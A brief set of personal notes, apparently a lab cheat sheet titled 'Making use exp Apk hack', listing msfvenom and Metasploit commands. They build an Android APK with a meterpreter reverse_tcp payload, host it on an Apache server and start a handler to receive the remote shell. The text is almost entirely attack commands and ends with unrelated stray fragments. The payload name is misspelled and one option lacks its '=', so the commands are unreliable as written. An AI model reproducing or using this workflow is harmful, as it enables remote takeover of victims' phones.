Making use exp Apk hack
msfvenom -p andriod/meterpreter/reverse_tcp LHOST 192.168.56.106 LPORT 2222 -o /root/hack.apk

mv hack.apk /var/www/html

service apache2 start
service apache2 status

msfconsole -q
> use exploit/multi/handler
> set payload andriod/meterpreter/reverse_tcp
> set lhost 192.168.56.106
> set lport 2222
> exploit


click
ctrl A + ctrl c

right click, create document